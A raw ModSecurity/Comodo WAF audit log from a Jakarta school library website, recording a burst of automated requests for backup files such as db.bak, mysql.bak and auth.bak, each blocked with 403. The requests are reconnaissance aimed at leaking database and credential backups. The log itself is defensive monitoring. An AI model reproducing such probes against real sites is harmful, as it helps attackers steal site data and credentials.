Action: Intercepted (phase 2) Stopwatch: 1747683201306576 5900 (- - -) Stopwatch2: 1747683201306576 5900; combined=941, p1=422, p2=483, p3=0, p4=0, p5=35, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69f9d777-Z-- --c2f05327-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFQQAAANI 103.236.140.4 58982 103.236.140.4 8181 --c2f05327-B-- GET /website.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683 Safari/537.36 OPR/57.0.3098.91 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159261365 --c2f05327-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c2f05327-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201311243 1923 (- - -) Stopwatch2: 1747683201311243 1923; combined=706, p1=351, p2=329, p3=0, p4=0, p5=26, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2f05327-Z-- --d56ce571-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFRAAAANI 103.236.140.4 59168 103.236.140.4 8181 --d56ce571-B-- GET /joomla.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70844455 --d56ce571-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d56ce571-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201313278 2040 (- - -) Stopwatch2: 1747683201313278 2040; combined=782, p1=366, p2=388, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d56ce571-Z-- --1127ac4f-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9nswAAAEQ 103.236.140.4 59608 103.236.140.4 8181 --1127ac4f-B-- GET /smkn22jakarta.sch.id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0.1) Gecko/20100101 Firefox/59.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155779134 --1127ac4f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1127ac4f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".sch.id.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201314715 2627 (- - -) Stopwatch2: 1747683201314715 2627; combined=833, p1=406, p2=393, p3=0, p4=0, p5=34, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1127ac4f-Z-- --4b5e9b0c-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9ntAAAAFg 103.236.140.4 59846 103.236.140.4 8181 --4b5e9b0c-B-- GET /sales.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165445647 --4b5e9b0c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4b5e9b0c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201315477 2072 (- - -) Stopwatch2: 1747683201315477 2072; combined=731, p1=370, p2=334, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b5e9b0c-Z-- --d7fe7620-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIonmwAAAAI 103.236.140.4 58914 103.236.140.4 8181 --d7fe7620-B-- GET /db.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36 OPR/55.0.2994.47 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164888585 --d7fe7620-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d7fe7620-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201316457 2163 (- - -) Stopwatch2: 1747683201316457 2163; combined=834, p1=413, p2=383, p3=0, p4=0, p5=38, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7fe7620-Z-- --b81c2869-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFTgAAAM0 103.236.140.4 58888 103.236.140.4 8181 --b81c2869-B-- GET /smkn22jakarta.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683 Safari/537.36 OPR/57.0.3098.91 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166625286 --b81c2869-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b81c2869-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201309842 11352 (- - -) Stopwatch2: 1747683201309842 11352; combined=967, p1=462, p2=471, p3=0, p4=0, p5=33, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b81c2869-Z-- --9e608b79-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9nvwAAAEQ 103.236.140.4 58946 103.236.140.4 8181 --9e608b79-B-- GET /mysql.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 OPR/55.0.2994.61 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155287576 --9e608b79-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9e608b79-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201321060 2040 (- - -) Stopwatch2: 1747683201321060 2040; combined=777, p1=369, p2=380, p3=0, p4=0, p5=28, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e608b79-Z-- --d0b73530-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_VgAAAI0 103.236.140.4 59620 103.236.140.4 8181 --d0b73530-B-- GET /smkn22jakartaschid.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:56.0.2) Gecko/20100101 Firefox/56.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164724742 --d0b73530-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d0b73530-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201319808 7712 (- - -) Stopwatch2: 1747683201319808 7712; combined=861, p1=421, p2=406, p3=0, p4=0, p5=33, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0b73530-Z-- --f430223f-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIonsAAAAAk 103.236.140.4 59352 103.236.140.4 8181 --f430223f-B-- GET /jsp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 OPR/55.0.2994.44 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127580987 --f430223f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f430223f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201330075 1748 (- - -) Stopwatch2: 1747683201330075 1748; combined=639, p1=375, p2=242, p3=0, p4=0, p5=22, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f430223f-Z-- --4448654d-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_YAAAAIw 103.236.140.4 59877 103.236.140.4 8181 --4448654d-B-- GET /2014.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162955273 --4448654d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4448654d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201342902 1923 (- - -) Stopwatch2: 1747683201342902 1923; combined=727, p1=344, p2=348, p3=0, p4=0, p5=35, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4448654d-Z-- --2fb6b255-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFawAAANc 103.236.140.4 59826 103.236.140.4 8181 --2fb6b255-B-- GET /erpustakaan.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:60.2.0) Gecko/20100101 Firefox/60.2.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 100177673 --2fb6b255-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2fb6b255-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201479976 11189 (- - -) Stopwatch2: 1747683201479976 11189; combined=9706, p1=597, p2=9078, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fb6b255-Z-- --edeeb621-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_aQAAAJg 103.236.140.4 59844 103.236.140.4 8181 --edeeb621-B-- GET /auth.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 OPR/56.0.3051.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164210714 --edeeb621-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --edeeb621-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201485229 8319 (- - -) Stopwatch2: 1747683201485229 8319; combined=3480, p1=540, p2=2912, p3=0, p4=0, p5=28, sr=167, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --edeeb621-Z-- --2e5e877d-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_dgAAAIw 103.236.140.4 59602 103.236.140.4 8181 --2e5e877d-B-- GET /2020.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70844461 --2e5e877d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2e5e877d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201492030 2269 (- - -) Stopwatch2: 1747683201492030 2269; combined=876, p1=326, p2=457, p3=0, p4=0, p5=61, sr=83, sw=32, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e5e877d-Z-- --7abafa27-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFewAAANA 103.236.140.4 59764 103.236.140.4 8181 --7abafa27-B-- GET /html.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770 Safari/537.36 OPR/57.0.3098.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167280646 --7abafa27-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7abafa27-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201489076 14601 (- - -) Stopwatch2: 1747683201489076 14601; combined=5935, p1=1361, p2=4538, p3=0, p4=0, p5=35, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7abafa27-Z-- --9800bb61-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIonzwAAAAc 103.236.140.4 59692 103.236.140.4 8181 --9800bb61-B-- GET /2011.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155287579 --9800bb61-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9800bb61-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201493896 9987 (- - -) Stopwatch2: 1747683201493896 9987; combined=1222, p1=558, p2=624, p3=0, p4=0, p5=39, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9800bb61-Z-- --ac46af19-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_fAAAAII 103.236.140.4 59820 103.236.140.4 8181 --ac46af19-B-- GET /master.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0.3) Gecko/20100101 Firefox/55.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162496536 --ac46af19-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ac46af19-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201496059 8002 (- - -) Stopwatch2: 1747683201496059 8002; combined=982, p1=358, p2=595, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac46af19-Z-- --97c9c573-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9n3QAAAEg 103.236.140.4 59854 103.236.140.4 8181 --97c9c573-B-- GET /asp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 